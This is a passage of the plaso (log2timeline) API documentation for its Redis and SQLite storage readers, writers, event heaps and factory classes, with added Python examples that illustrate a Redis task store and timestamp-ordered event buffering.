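        self._is_open = True
        # Sources present before this Open do not count as newly written.
        self._first_written_index = len(self._event_sources)
        self._cursor = self._first_written_index

    def Close(self):
        self._RaiseIfClosed()
        self._is_open = False

    def AddEvent(self, event):
        self._RaiseIfClosed()
        # Insert in timestamp order so a sorted read is a plain slice.
        index = bisect.bisect_right(self._timestamps, event.timestamp)
        self._timestamps.insert(index, event.timestamp)
        self._events.insert(index, event)

    def AddEventSource(self, event_source):
        self._RaiseIfClosed()
        self._event_sources.append(event_source)

    def GetFirstWrittenEventSource(self):
        self._RaiseIfClosed()
        self._cursor = self._first_written_index
        return self.GetNextWrittenEventSource()

    def GetNextWrittenEventSource(self):
        self._RaiseIfClosed()
        if self._cursor >= len(self._event_sources):
            return None
        event_source = self._event_sources[self._cursor]
        self._cursor += 1
        return event_source

    def GetSortedEvents(self, time_range=None):
        self._RaiseIfClosed()
        if time_range is None:
            return iter(list(self._events))
        start = bisect.bisect_left(self._timestamps, time_range.start_timestamp)
        end = bisect.bisect_right(self._timestamps, time_range.end_timestamp)
        return iter(self._events[start:end])
```

The Raises entries on this page list IOError and OSError together because in Python 3 IOError is an alias of OSError; a caller that catches either catches both. The cursor is what lets a producer keep appending event sources while a consumer drains them: GetNextWrittenEventSource returns None when it catches up and simply resumes once more sources are added, without the consumer having to track indices itself.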
Module contents
plaso.storage.redis package
Submodules
plaso.storage.redis.merge_reader module
Redis merge reader.
class plaso.storage.redis.merge_reader.RedisMergeReader(storage_writer, task, redis_client=None)
Bases: plaso.storage.interface.StorageMergeReader
Redis store reader for merging.
MergeAttributeContainers(callback=None, maximum_number_of_containers=0)
Reads attribute containers from a task store into the writer.
Parameters
• callback (Optional[function[StorageWriter, AttributeContainer]]) – function to call after each attribute container is deserialized.
• maximum_number_of_containers (Optional[int]) – maximum number of containers to merge, where 0 represents no limit.
Returns True if the entire task store has been merged.
Return type bool
Raises RuntimeError – if the add method for the active attribute container type is missing.
plaso.storage.redis.reader module
Redis reader.
class plaso.storage.redis.reader.RedisStorageReader(task)
Bases: plaso.storage.interface.StorageReader
Redis storage file reader.
Close()
Closes the storage reader.
GetAnalysisReports()
Retrieves the analysis reports.
Returns analysis report generator.
Return type generator(AnalysisReport)
GetEventData()
Retrieves the event data.
Returns event data generator.
Return type generator(EventData)
GetEventDataByIdentifier(identifier)
Retrieves specific event data.
Parameters identifier (AttributeContainerIdentifier) – event data identifier.
Returns event data or None if not available.
Return type EventData
GetEventDataStreamByIdentifier(identifier)
Retrieves a specific event data stream.
Parameters identifier (AttributeContainerIdentifier) – event data stream identifier.
Returns event data stream or None if not available.
Return type EventDataStream
GetEventDataStreams()
Retrieves the event data streams.
Returns event data stream generator.
Return type generator(EventDataStream)
GetEventSources()
Retrieves event sources.
Returns event source generator.
Return type generator(EventSource)
GetEventTagByIdentifier(identifier)
Retrieves a specific event tag.
Parameters identifier (AttributeContainerIdentifier) – event tag identifier.
Returns event tag or None if not available.
Return type EventTag
GetEventTags()
Retrieves the event tags.
Returns event tag generator.
Return type generator(EventTag)
GetEvents()
Retrieves the events.
Returns event generator.
Return type generator(EventObject)
GetNumberOfAnalysisReports()
Retrieves the number of analysis reports.
Returns number of analysis reports.
Return type int
GetNumberOfEventSources()
Retrieves the number of event sources.
Returns number of event sources.
Return type int
GetSessions()
Retrieves the sessions.
Returns session generator.
Return type generator(Session)
GetSortedEvents(time_range=None)
Retrieves the events in increasing chronological order.
This includes all events written to the storage including those pending being flushed (written) to the storage.
Parameters time_range (Optional[TimeRange]) – time range used to filter events thatfall in a specific period.
Returns event generator.
Return type generator(EventObject)
GetWarnings()
Retrieves the warnings.
Returns extraction warning generator.
Return type generator(ExtractionWarning)
HasAnalysisReports()
Determines if a store contains analysis reports.
Returns True if the store contains analysis reports.
Return type bool
HasEventTags()
Determines if a store contains event tags.
Returns True if the store contains event tags.
Return type bool
HasWarnings()
Determines if a store contains extraction warnings.
Returns True if the store contains extraction warnings.
Return type bool
IsFinalized()
Checks if the store has been finalized.
Returns True if the store has been finalized.
Return type bool
Open()
Opens the storage reader.
ReadSystemConfiguration(knowledge_base)
Reads system configuration information.
The system configuration contains information about various system specific configuration data, for example the user accounts.
Parameters knowledge_base (KnowledgeBase) – is used to store the preprocessing information.
SetSerializersProfiler(serializers_profiler)
Sets the serializers profiler.
Parameters serializers_profiler (SerializersProfiler) – serializers profiler.
SetStorageProfiler(storage_profiler)
Sets the storage profiler.
Parameters storage_profiler (StorageProfiler) – storage profiler.
plaso.storage.redis.redis_store module
Redis store.
Only supports task storage at the moment.
class plaso.storage.redis.redis_store.RedisStore(storage_type='task', session_identifier=None, task_identifier=None)
Bases: plaso.storage.interface.BaseStore
Redis store.
Attribute containers are stored as Redis Hashes. All keys are prefixed with the session identifier to avoid collisions. Event identifiers are also stored in an index to enable sorting.
AddEvent(event, serialized_data=None)
Adds an event.
Parameters
• event (EventObject) – event.
• serialized_data (Optional[bytes]) – serialized form of the event.
Close()
Closes the store.
DEFAULT_REDIS_URL = 'redis://127.0.0.1/0'
Finalize()
Marks a store as finalized.
No further attribute containers will be written to a finalized store.
GetSerializedAttributeContainers(container_type, cursor, maximum_number_of_items)
Fetches serialized attribute containers.
Parameters
• container_type (str) – attribute container type.
• cursor (int) – Redis cursor.
• maximum_number_of_items (int) – maximum number of containers to retrieve, where 0 represents no limit.
Returns
containing: int: Redis cursor. list[bytes]: serialized attribute containers.
Return type tuple
GetSortedEvents(time_range=None)
Retrieves the events in increasing chronological order.
Parameters time_range (Optional[TimeRange]) – This argument is not supported by the Redis store.
Yields EventObject – event.
Raises RuntimeError – if a time_range argument is specified.
IsFinalized()
Checks if a store has been finalized.
Returns True if the store has been finalized.
Return type bool
classmethod MarkTaskAsMerging(task_identifier, session_identifier, redis_client=None, url=None)
Marks a finalized task as pending merge.
Parameters
• task_identifier (str) – identifier of the task.
• session_identifier (str) – session identifier, formatted as a UUID.
• redis_client (Optional[Redis]) – Redis client to query. If specified, no new client will be created.
• url (Optional[str]) – URL for a Redis database. If not specified, DEFAULT_REDIS_URL will be used.
Raises
• IOError – if the task being updated is not finalized.
• OSError – if the task being updated is not finalized.
Open(redis_client=None, url=None, **unused_kwargs)
Opens the store.
Parameters
• redis_client (Optional[Redis]) – Redis client to query. If specified, no new client will be created. If no client is specified a new client will be opened connected to the Redis instance specified by ‘url’.
• url (Optional[str]) – URL for a Redis database. If not specified, DEFAULT_REDIS_URL will be used.
Raises
• IOError – if the store is already connected to a Redis instance.
• OSError – if the store is already connected to a Redis instance.
Remove()
Removes the contents of the store from Redis.
RemoveAttributeContainer(container_type, identifier)
Removes an attribute container from the store.
Parameters
• container_type (str) – container type attribute of the container being removed.
• identifier (AttributeContainerIdentifier) – identifier of the container being removed.
RemoveAttributeContainers(container_type, container_identifiers)
Removes multiple attribute containers from the store.
Parameters
• container_type (str) – container type attribute of the containers being removed.
• container_identifiers (list[AttributeContainerIdentifier]) – identifiers of the containers being removed.
classmethod ScanForProcessedTasks(session_identifier, redis_client=None, url=None)
Scans a Redis database for processed tasks.
Parameters
• session_identifier (str) – session identifier, formatted as a UUID.
• redis_client (Optional[Redis]) – Redis client to query. If specified, no new client will be created.
• url (Optional[str]) – URL for a Redis database. If not specified, DEFAULT_REDIS_URL will be used.
Returns
containing:
list[str]: identifiers of processed tasks, which may be empty if the connection to Redis times out.
Redis: Redis client used for the query.
Return type tuple
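RedisStore keeps each task's attribute containers in Redis hashes whose keys carry the session and task identifiers, keeps a separate index of event identifiers so that events can be returned in timestamp order, and marks finalized tasks so that ScanForProcessedTasks can find them. The following is an added example, not plaso's redis_store module: the key layout ('<session>-<task>-<container type>' hashes, an 'event_index' sorted set scored by timestamp and a '<session>-finalized' hash) is an assumption made for this illustration, and InMemoryRedis is a constructed stand-in that exposes the redis-py method names and signatures the store uses, so the block runs without a server.

```python
class InMemoryRedis:
    """Constructed stand-in for redis.Redis exposing, with redis-py's
    signatures, only the methods RedisTaskStore calls."""

    def __init__(self):
        self._hashes = {}
        self._sorted_sets = {}

    def hset(self, name, key, value):
        self._hashes.setdefault(name, {})[key] = value

    def hget(self, name, key):
        return self._hashes.get(name, {}).get(key)

    def hkeys(self, name):
        return list(self._hashes.get(name, {}))

    def hdel(self, name, *keys):
        entries = self._hashes.get(name, {})
        return sum(1 for key in keys if entries.pop(key, None) is not None)

    def zadd(self, name, mapping):
        self._sorted_sets.setdefault(name, {}).update(mapping)

    def zrem(self, name, *members):
        entries = self._sorted_sets.get(name, {})
        return sum(1 for m in members if entries.pop(m, None) is not None)

    def zrangebyscore(self, name, min, max):
        # Accepts the same '-inf' / '+inf' bounds a real Redis server does.
        low, high = float(min), float(max)
        entries = self._sorted_sets.get(name, {})
        ordered = sorted(entries.items(), key=lambda item: (item[1], item[0]))
        return [member for member, score in ordered if low <= score <= high]


class RedisTaskStore:
    """Task store whose keys are namespaced by session and task (assumed layout)."""

    DEFAULT_REDIS_URL = 'redis://127.0.0.1/0'

    def __init__(self, redis_client, session_identifier, task_identifier):
        self._client = redis_client
        self._session_identifier = session_identifier
        self._task_identifier = task_identifier
        self._key_prefix = '{0:s}-{1:s}'.format(session_identifier, task_identifier)
        self._finalized = False
        self._next_identifier = 0

    def _HashName(self, container_type):
        return '{0:s}-{1:s}'.format(self._key_prefix, container_type)

    @staticmethod
    def _FinalizedHashName(session_identifier):
        return '{0:s}-finalized'.format(session_identifier)

    def AddContainer(self, container_type, serialized_data, timestamp=None):
        """Stores one serialized container; events are also indexed by timestamp."""
        if self._finalized:
            raise IOError('store is finalized, no further containers accepted')
        if container_type == 'event' and timestamp is None:
            raise ValueError('events need a timestamp for the sort index')
        identifier = str(self._next_identifier)
        self._next_identifier += 1
        self._client.hset(self._HashName(container_type), identifier, serialized_data)
        if container_type == 'event':
            self._client.zadd(self._HashName('event_index'), {identifier: timestamp})
        return identifier

    def GetSortedEvents(self):
        """Yields serialized events in increasing timestamp order via the index."""
        index_name = self._HashName('event_index')
        for identifier in self._client.zrangebyscore(index_name, '-inf', '+inf'):
            yield self._client.hget(self._HashName('event'), identifier)

    def RemoveAttributeContainer(self, container_type, identifier):
        self._client.hdel(self._HashName(container_type), identifier)
        if container_type == 'event':
            self._client.zrem(self._HashName('event_index'), identifier)

    def Finalize(self):
        self._finalized = True
        self._client.hset(
            self._FinalizedHashName(self._session_identifier), self._task_identifier, '1')

    def IsFinalized(self):
        return self._finalized

    @classmethod
    def ScanForProcessedTasks(cls, redis_client, session_identifier):
        return redis_client.hkeys(cls._FinalizedHashName(session_identifier))
```

With a real client (redis.Redis.from_url(RedisTaskStore.DEFAULT_REDIS_URL), the loopback URL this page lists as DEFAULT_REDIS_URL), hget and zrangebyscore return bytes unless the client is created with decode_responses=True; the stand-in returns whatever was stored. The unauthenticated loopback default is reasonable on a single workstation, but a Redis instance that holds task stores for several workers should stay bound to localhost or be protected with requirepass, since any client that can reach it can alter or drop events before they are merged into the session store.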
plaso.storage.redis.writer module
Storage writer for Redis.
class plaso.storage.redis.writer.RedisStorageWriter(session, storage_type='task', task=None)
Bases: plaso.storage.interface.StorageWriter
Redis-based storage writer.
AddAnalysisReport(analysis_report)
Adds an analysis report.
Parameters analysis_report (AnalysisReport) – a report.
AddEvent(event, serialized_data=None)
Adds an event.
Parameters
• event (EventObject) – an event.
• serialized_data (Optional[bytes]) – serialized form of the event.
AddEventData(event_data, serialized_data=None)
Adds event data.
Parameters
• event_data (EventData) – event data.
• serialized_data (Optional[bytes]) – serialized form of the event data.
AddEventDataStream(event_data_stream, serialized_data=None)
Adds an event data stream.
5.1. Subpackages 457
Plaso (log2timeline), Release 20201007
Parameters
• event_data_stream (EventDataStream) – event data stream.
• serialized_data (Optional[bytes]) – serialized form of the event data stream.
AddEventSource(event_source, serialized_data=None)
Adds an event source.
Parameters
• event_source (EventSource) – an event source.
• serialized_data (Optional[bytes]) – serialized form of the event source.
AddEventTag(event_tag, serialized_data=None)
Adds an event tag.
Parameters
• event_tag (EventTag) – an event tag.
• serialized_data (Optional[bytes]) – serialized form of the event tag.
AddWarning(warning, serialized_data=None)
Adds a warning.
Parameters
• warning (ExtractionWarning) – a warning.
• serialized_data (Optional[bytes]) – serialized form of the warning.
CheckTaskReadyForMerge(task)
Checks if a task is ready for merging into the store.
Parameters task (Task) – task.
Returns True if the task is ready to be merged.
Return type bool
Close()
Closes the storage writer.
Raises
• IOError – if the storage writer is closed.
• OSError – if the storage writer is closed.
CreateTaskStorage(task, task_storage_format)
Creates a task storage.
Parameters
• task (Task) – task.
• task_storage_format (str) – storage format to store task results.
Raises
• IOError – always, as creating a task is not supported by the Redis store.
• OSError – always, as creating a task is not supported by the Redis store.
FinalizeTaskStorage(task)
Finalizes a processed task storage.
Parameters task (Task) – task.
Raises
• IOError – always, as finalizing a task storage is not supported by the Redis store.
• OSError – always, as finalizing a task storage is not supported by the Redis store.
GetEventDataByIdentifier(identifier)
Retrieves specific event data.
Parameters identifier (AttributeContainerIdentifier) – event data identifier.
Returns event data or None if not available.
Return type EventData
GetEventDataStreamByIdentifier(identifier)
Retrieves a specific event data stream.
Parameters identifier (AttributeContainerIdentifier) – event data stream identifier.
Returns event data stream or None if not available.
Return type EventDataStream
GetEvents()
Retrieves the events.
Returns event generator.
Return type generator(EventObject)
GetFirstWrittenEventSource()
Retrieves the first event source that was written after open.
Using GetFirstWrittenEventSource and GetNextWrittenEventSource newly added event sources can be retrieved in order of addition.
Returns None as there are no newly written event sources.
Return type EventSource
Raises
• IOError – if the storage writer is closed.
• OSError – if the storage writer is closed.
GetNextWrittenEventSource()
Retrieves the next event source that was written after open.
Returns None as there are no newly written event sources.
Return type EventSource
Raises
• IOError – if the storage writer is closed.
• OSError – if the storage writer is closed.
GetSortedEvents(time_range=None)
Retrieves the events in increasing chronological order.
This includes all events written to the storage including those pending being flushed (written) to the storage.
Parameters time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period.
Returns event generator.
Return type generator(EventObject)
Raises
• IOError – if the storage writer is closed.
• OSError – if the storage writer is closed.
Open(redis_client=None, **unused_kwargs)
Opens the storage writer.
Raises
• IOError – if the storage writer is already opened.
• OSError – if the storage writer is already opened.
PrepareMergeTaskStorage(task)
Prepares a task storage for merging.
Parameters task (Task) – task.
ReadSystemConfiguration(knowledge_base)
Reads system configuration information.
The system configuration contains information about various system specific configuration data, for example the user accounts.
Parameters knowledge_base (KnowledgeBase) – is used to store the preprocessing information.
Raises
• IOError – always, as the Redis store does not support preprocessing information.
• OSError – always, as the Redis store does not support preprocessing information.
RemoveProcessedTaskStorage(task)
Removes a processed task storage.
Parameters task (Task) – task.
Raises
• IOError – always, as the Redis store does not support removing a task store.
• OSError – always, as the Redis store does not support removing a task store.
SetSerializersProfiler(serializers_profiler)
Sets the serializers profiler.
Parameters serializers_profiler (SerializersProfiler) – serializers profiler.
SetStorageProfiler(storage_profiler)
Sets the storage profiler.
Parameters storage_profiler (StorageProfiler) – storage profiler.
WritePreprocessingInformation(knowledge_base)
Writes preprocessing information.
Parameters knowledge_base (KnowledgeBase) – contains the preprocessing information.
Raises
• IOError – always as the Redis store does not support preprocessing information.
• OSError – always as the Redis store does not support preprocessing information.
WriteSessionCompletion(aborted=False)
Writes session completion information.
Parameters aborted (Optional[bool]) – True if the session was aborted.
Raises
• IOError – always, as the Redis store does not support writing a session completion.
• OSError – always, as the Redis store does not support writing a session completion.
WriteSessionConfiguration()
Writes session configuration information.
Raises
• IOError – always, as the Redis store does not support writing a session configuration.
• OSError – always, as the Redis store does not support writing a session configuration.
WriteSessionStart()
Writes session start information.
Raises
• IOError – always, as the Redis store does not support writing a session start.
• OSError – always, as the Redis store does not support writing a session start.
WriteTaskCompletion(aborted=False)
Writes task completion information.
Parameters aborted (Optional[bool]) – True if the task was aborted.
Raises
• IOError – if the storage type is not supported or when the storage writer is closed.
• OSError – if the storage type is not supported or when the storage writer is closed.
WriteTaskStart()
Writes task start information.
Raises
• IOError – if the storage type does not support writing a task start or when the storage writer is closed.
• OSError – if the storage type does not support writing a task start or when the storage writer is closed.
Module contents
plaso.storage.sqlite package
Submodules
plaso.storage.sqlite.merge_reader module
Merge reader for SQLite storage files.
class plaso.storage.sqlite.merge_reader.SQLiteStorageMergeReader(storage_writer, path)
Bases: plaso.storage.interface.StorageMergeReader
SQLite-based storage file reader for merging.
MergeAttributeContainers(callback=None, maximum_number_of_containers=0)
Reads attribute containers from a task storage file into the writer.
Parameters
• callback (Optional[function[StorageWriter, AttributeContainer]]) – function to call after each attribute container is deserialized.
• maximum_number_of_containers (Optional[int]) – maximum number of containers to merge, where 0 represents no limit.
Returns True if the entire task storage file has been merged.
Return type bool
Raises
• RuntimeError – if the add method for the active attribute container type is missing.
• OSError – if the task storage file cannot be deleted.
• ValueError – if the maximum number of containers is a negative value.
plaso.storage.sqlite.reader module
Reader for SQLite storage files.
class plaso.storage.sqlite.reader.SQLiteStorageFileReader(path)
Bases: plaso.storage.file_interface.StorageFileReader
SQLite-based storage file reader.
plaso.storage.sqlite.sqlite_file module
SQLite-based storage.
class plaso.storage.sqlite.sqlite_file.SQLiteStorageFile(maximum_buffer_size=0, storage_type='session')
Bases: plaso.storage.file_interface.BaseStorageFile
SQLite-based storage file.
format_version
storage format version.
Type int
serialization_format
serialization format.
Type str
storage_type
storage type.
Type str
AddEvent(event, serialized_data=None)
Adds an event.
Parameters
• event (EventObject) – event.
• serialized_data (Optional[bytes]) – serialized form of the event.
Raises
• IOError – when the storage file is closed or read-only.
• OSError – when the storage file is closed or read-only.
AddEventData(event_data, serialized_data=None)
Adds event data.
Parameters
• event_data (EventData) – event data.
• serialized_data (Optional[bytes]) – serialized form of the event data.
Raises
• IOError – when the storage file is closed or read-only.
• OSError – when the storage file is closed or read-only.
AddEventTag(event_tag, serialized_data=None)
Adds an event tag.
Parameters
• event_tag (EventTag) – event tag.
• serialized_data (Optional[bytes]) – serialized form of the event tag.
Raises
• IOError – when the storage file is closed or read-only.
• OSError – when the storage file is closed or read-only.
classmethod CheckSupportedFormat(path, check_readable_only=False)
Checks if the storage file format is supported.
Parameters
• path (str) – path to the storage file.
• check_readable_only (Optional[bool]) – whether the store should only be checked to see if it can be read. If False, the store will be checked to see if it can be read and written to.
Returns True if the format is supported.
Return type bool
Close()
Closes the file.
Raises
• IOError – if the storage file is already closed.
• OSError – if the storage file is already closed.
GetEventData()
Retrieves event data.
Yields EventData – event data.
GetEventDataByIdentifier(identifier)
Retrieves specific event data.
Parameters identifier (SQLTableIdentifier) – event data identifier.
Returns event data or None if not available.
Return type EventData
Raises
• OSError – if an invalid identifier is provided.
• IOError – if an invalid identifier is provided.
GetEventSourceByIndex(index)
Retrieves a specific event source.
Parameters index (int) – event source index.
Returns event source or None if not available.
Return type EventSource
GetEventTagByIdentifier(identifier)
Retrieves a specific event tag.
Parameters identifier (SQLTableIdentifier) – event tag identifier.
Returns event tag or None if not available.
Return type EventTag
Raises
• OSError – if an invalid identifier is provided.
• IOError – if an invalid identifier is provided.
GetEventTags()
Retrieves the event tags.
Yields EventTag – event tag.
GetEvents()
Retrieves the events.
Yields EventObject – event.
GetNumberOfEventSources()
Retrieves the number of event sources.
Returns number of event sources.
Return type int
GetSortedEvents(time_range=None)
Retrieves the events in increasing chronological order.
Parameters time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period.
Yields EventObject – event.
GetWarnings()
Retrieves the warnings.
Returns warning generator.
Return type generator(ExtractionWarning)
Open(path=None, read_only=True, **unused_kwargs)
Opens the storage.
Parameters
• path (Optional[str]) – path to the storage file.
• read_only (Optional[bool]) – True if the file should be opened in read-only mode.
Raises
• IOError – if the storage file is already opened or if the database cannot be connected.
• OSError – if the storage file is already opened or if the database cannot be connected.
• ValueError – if path is missing.
plaso.storage.sqlite.writer module
Storage writer for SQLite storage files.
class plaso.storage.sqlite.writer.SQLiteStorageFileWriter(session, output_file, storage_type='session', task=None)
Bases: plaso.storage.file_interface.StorageFileWriter
SQLite-based storage file writer.
CheckTaskReadyForMerge(task)
Checks if a task is ready for merging with this session storage.
Parameters task (Task) – task.
Returns True if the task is ready to be merged.
Return type bool
Raises
• IOError – if the storage type is not supported or if the temporary path for the task storage does not exist.
• OSError – if the storage type is not supported or if the temporary path for the task storage does not exist.
CreateTaskStorage(task, task_storage_format)
Creates a task storage.
The task storage is used to store attribute containers created by the task.
Parameters
• task (Task) – task.
• task_storage_format (str) – storage format used to store task results.
Returns storage writer.
Return type StorageWriter
Raises
• OSError – if the storage type or storage format is not supported.
• IOError – if the storage type or storage format is not supported.
Module contents
Submodules
plaso.storage.event_heaps module
Heaps to sort events in chronological order.
class plaso.storage.event_heaps.EventHeap
Bases: object
Event heap.
PopEvent()
Pops an event from the heap.
Returns event.
Return type EventObject
PopEvents()
Pops events from the heap.
Yields EventObject – event.
PushEvent(event, event_index)
Pushes an event onto the heap.
Parameters
• event (EventObject) – event.
• event_index (int) – index of the event in the storage.
property number_of_events
number of events on the heap.
Type int
class plaso.storage.event_heaps.SerializedEventHeap
Bases: object
Serialized event heap.
data_size
total data size of the serialized events on the heap.
Type int
Empty()
Empties the heap.
PopEvent()
Pops an event from the heap.
Returns a tuple containing:
int: event timestamp or None if the heap is empty
bytes: serialized event or None if the heap is empty
Return type tuple
PushEvent(timestamp, event_data)
Pushes a serialized event onto the heap.
Parameters
• timestamp (int) – event timestamp, which contains the number of microseconds since January 1, 1970, 00:00:00 UTC.
• event_data (bytes) – serialized event.
property number_of_events
number of serialized events on the heap.
Type int
plaso.storage.event_tag_index module
The event tag index.
class plaso.storage.event_tag_index.EventTagIndex
Bases: object
Event tag index.
The event tag index is used to map event tags to events.
It is necessary for the ZIP storage files since previously stored event tags cannot be altered.
GetEventTagByIdentifier(storage_file, event_identifier)
Retrieves the most recently updated event tag for an event.
Parameters
• storage_file (BaseStorageFile) – storage file.
• event_identifier (AttributeContainerIdentifier) – event attribute container identifier.
Returns event tag or None if the event has no event tag.
Return type EventTag
SetEventTag(event_tag)
Sets an event tag in the index.
Parameters event_tag (EventTag) – event tag.
plaso.storage.factory module
This file contains the storage factory class.
class plaso.storage.factory.StorageFactory
Bases: object
Storage factory.
classmethod CreateStorageFile(storage_format)
Creates a storage file.
Parameters storage_format (str) – storage format.
Returns a storage file or None if the storage file cannot be opened or the storage format is not supported.
Return type StorageFile
classmethod CreateStorageReaderForFile(path)
Creates a storage reader based on the file.
Parameters path (str) – path to the storage file.
Returns a storage reader or None if the storage file cannot be opened or the storage format is not supported.
Return type StorageReader
classmethod CreateStorageWriter(storage_format, session, path)
Creates a storage writer.
Parameters
• storage_format (str) – storage format.
• session (Session) – session the storage changes are part of.
• path (str) – path to the storage file.
Returns a storage writer or None if the storage file cannot be opened or the storage format is not supported.
Return type StorageWriter
classmethod CreateStorageWriterForFile(session, path)
Creates a storage writer based on the file.
Parameters
• session (Session) – session the storage changes are part of.
• path (str) – path to the storage file.
Returns a storage writer or None if the storage file cannot be opened or the storage format is not supported.
Return type StorageWriter
plaso.storage.file_interface module
Storage interface classes for file-backed stores.
class plaso.storage.file_interface.BaseStorageFile
Bases: plaso.storage.interface.BaseStore
Interface for file-based stores.
class plaso.storage.file_interface.SerializedAttributeContainerList
Bases: object
Serialized attribute container list.
The list is unsorted: attribute containers are popped in the same order in which they were pushed, so insertion order is preserved.
The GetAttributeContainerByIndex method should be used to read attribute containers from the list while it is still being filled.
data_size
total data size of the serialized attribute containers on the list.
Type int
next_sequence_number
next attribute container sequence number.
Type int
Empty()
Empties the list.
GetAttributeContainerByIndex(index)
Retrieves a specific serialized attribute container from the list.
Parameters index (int) – attribute container index.
Returns serialized attribute container data or None if not available.
Return type bytes
Raises IndexError – if the index is less than zero.
PopAttributeContainer()
Pops a serialized attribute container from the list.
Returns serialized attribute container data or None if the list is empty.
Return type bytes
PushAttributeContainer(serialized_data)
Pushes a serialized attribute container onto the list.
Parameters serialized_data (bytes) – serialized attribute container data.
property number_of_attribute_containers
number of serialized attribute containers on the list.
Type int
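The event heap (plaso.storage.event_heaps, above) and the serialized attribute container list are the two buffers a file-backed writer keeps before a flush: the heap orders events by timestamp, the list keeps containers in insertion order and can be read by index while it is still being filled. The Python example below, written for this page and not taken from plaso, implements both with the semantics documented here (data_size accounting, (None, None) from an empty heap, IndexError for a negative index) and a small writer that flushes them once a maximum_buffer_size is exceeded. The flush policy, the JSON serialization and the sample fs:stat records are assumptions made for the example.

```python
# Example code, not plaso's own implementation: in-memory buffers modelled on the
# SerializedEventHeap and SerializedAttributeContainerList documented above, and a
# writer that flushes them. The flush policy and the sample records are assumed.
import heapq
import json


class SerializedEventHeap(object):
  """Min-heap keyed on timestamp; PopEvent returns the oldest event first."""

  def __init__(self):
    self._heap = []
    self._counter = 0      # tie-breaker: equal timestamps pop in push order
    self.data_size = 0     # total bytes of serialized events on the heap

  def PushEvent(self, timestamp, event_data):
    # The counter keeps the bytes out of the comparison; content never orders.
    heapq.heappush(self._heap, (timestamp, self._counter, event_data))
    self._counter += 1
    self.data_size += len(event_data)

  def PopEvent(self):
    if not self._heap:
      return None, None
    timestamp, _, event_data = heapq.heappop(self._heap)
    self.data_size -= len(event_data)
    return timestamp, event_data


class SerializedAttributeContainerList(object):
  """FIFO of serialized containers, readable by index while still being filled."""

  def __init__(self):
    self._list = []
    self.data_size = 0
    self.next_sequence_number = 0   # identifier the next pushed container gets

  def GetAttributeContainerByIndex(self, index):
    if index < 0:
      raise IndexError('Unsupported negative index: {0:d}'.format(index))
    return self._list[index] if index < len(self._list) else None

  def PopAttributeContainer(self):
    if not self._list:
      return None
    serialized_data = self._list.pop(0)
    self.data_size -= len(serialized_data)
    return serialized_data

  def PushAttributeContainer(self, serialized_data):
    self._list.append(serialized_data)
    self.data_size += len(serialized_data)
    self.next_sequence_number += 1


class BufferedStorageWriter(object):
  """Flushes the buffers when they exceed maximum_buffer_size bytes (0: on Close)."""

  def __init__(self, maximum_buffer_size=0):
    self._maximum_buffer_size = maximum_buffer_size
    self._event_data_list = SerializedAttributeContainerList()
    self._event_heap = SerializedEventHeap()
    self.written_event_data = []   # stands in for the event_data table
    self.written_events = []       # stands in for the event table

  def AddEventData(self, attributes):
    # FIFO flushing makes the sequence number the row the container lands in.
    identifier = self._event_data_list.next_sequence_number
    self._event_data_list.PushAttributeContainer(
        json.dumps(attributes, sort_keys=True).encode('utf-8'))
    self._MaybeFlush()
    return identifier

  def AddEvent(self, timestamp, event_data_identifier):
    self._event_heap.PushEvent(timestamp, json.dumps(
        {'timestamp': timestamp, 'event_data': event_data_identifier}).encode('utf-8'))
    self._MaybeFlush()

  def GetPendingEventData(self, identifier):
    """Event data still in the buffer, or None once it has been flushed."""
    index = identifier - len(self.written_event_data)
    data = self._event_data_list.GetAttributeContainerByIndex(index) if index >= 0 else None
    return json.loads(data) if data is not None else None

  def _MaybeFlush(self):
    buffered = self._event_data_list.data_size + self._event_heap.data_size
    if self._maximum_buffer_size and buffered > self._maximum_buffer_size:
      self.Close()

  def Close(self):
    """Flushes event data in push order and events in timestamp order."""
    for data in iter(self._event_data_list.PopAttributeContainer, None):
      self.written_event_data.append(json.loads(data))
    for _, data in iter(self._event_heap.PopEvent, (None, None)):
      self.written_events.append(json.loads(data))


def RunExample(maximum_buffer_size=0):
  """Constructed sample: one event data container and three out-of-order events."""
  writer = BufferedStorageWriter(maximum_buffer_size)
  identifier = writer.AddEventData({'data_type': 'fs:stat', 'filename': '/var/log/auth.log'})
  pending = writer.GetPendingEventData(identifier)
  for timestamp in (1601856000000000, 1601769600000000, 1601856000000000):
    writer.AddEvent(timestamp, identifier)
  writer.Close()
  return pending, [event['timestamp'] for event in writer.written_events], writer
```

Run RunExample() with maximum_buffer_size=0 and the events come out in chronological order; run it with a buffer of one byte and every add triggers its own flush, so the written events appear in insertion order. The heap therefore only orders events within one flush batch, which is why a reader of the backing file still has to sort at read time (the SQLite store does this with ORDER BY) rather than trusting write order.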
class plaso.storage.file_interface.StorageFileMergeReader(storage_writer)
Bases: plaso.storage.interface.StorageMergeReader
Storage reader interface for merging file-based stores.
class plaso.storage.file_interface.StorageFileReader(path)
Bases: plaso.storage.interface.StorageReader
File-based storage reader interface.
Close()
Closes the storage reader.
GetAnalysisReports()
Retrieves the analysis reports.
Returns analysis report generator.
Return type generator(AnalysisReport)
GetEventData()
Retrieves the event data.
Returns event data generator.
Return type generator(EventData)
GetEventDataByIdentifier(identifier)
Retrieves specific event data.
Parameters identifier (AttributeContainerIdentifier) – event data identifier.
Returns event data or None if not available.
Return type EventData
GetEventDataStreamByIdentifier(identifier)
Retrieves a specific event data stream.
Parameters identifier (AttributeContainerIdentifier) – event data stream identifier.
Returns event data stream or None if not available.
Return type EventDataStream
GetEventDataStreams()
Retrieves the event data streams.
Returns event data stream generator.
Return type generator(EventDataStream)
GetEventSources()
Retrieves the event sources.
Returns event source generator.
Return type generator(EventSource)
GetEventTagByIdentifier(identifier)
Retrieves a specific event tag.
Parameters identifier (AttributeContainerIdentifier) – event tag identifier.
Returns event tag or None if not available.
Return type EventTag
GetEventTags()
Retrieves the event tags.
Returns event tag generator.
Return type generator(EventTag)
GetEvents()
Retrieves the events.
Returns event generator.
Return type generator(EventObject)
GetFormatVersion()
Retrieves the format version of the underlying storage file.
Returns the format version, or None if not available.
Return type int
GetNumberOfAnalysisReports()
Retrieves the number of analysis reports.
Returns number of analysis reports.
Return type int
GetNumberOfEventSources()
Retrieves the number of event sources.
Returns number of event sources.
Return type int
GetSerializationFormat()
Retrieves the serialization format of the underlying storage file.
Returns the serialization format, or None if not available.
Return type str
GetSessions()
Retrieves the sessions.
Returns session generator.
Return type generator(Session)
GetSortedEvents(time_range=None)
Retrieves the events in increasing chronological order.
This includes all events written to the storage including those pending being flushed (written) to the storage.
